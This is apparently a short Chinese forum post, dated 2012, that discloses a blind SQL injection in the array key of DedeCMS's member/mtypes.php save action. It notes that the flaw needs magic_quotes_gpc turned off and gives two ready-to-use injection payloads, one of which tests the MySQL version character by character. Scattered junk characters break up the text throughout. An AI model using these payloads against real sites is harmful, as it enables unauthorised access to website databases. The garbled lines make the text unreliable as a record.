需要magic_quotes_gpc = Off,所以说是鸡肋啊.
% i5 D4 g# V @4 l A3 u* x+ B7 p: X. A
& A/ V8 \( K, o, q: `2 Z+ C/ G发生在数组key里的注射漏洞,有点意思.9 s5 I$ x5 O5 i
8 [# a; R* S# Q4 S8 j5 B6 O
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
: k; W; T. f7 r4 i/ p
- A T/ _3 ]; M0 ehttp://www.xxx.com /dede/member/mtypes.php?dopost=save
4 {- K8 b: r" U4 A( }4 U b 3 \9 a& Q! j" i0 t: k
exploit:6 }6 H' _0 A! h \' B. U; W
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
( n9 K- w3 }2 ?- }8 s& jmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r7 x! `. B- @" w8 D" Q, V4 P! l( i
|
发表于 2012-12-20 08:08:09
收藏
支持
反对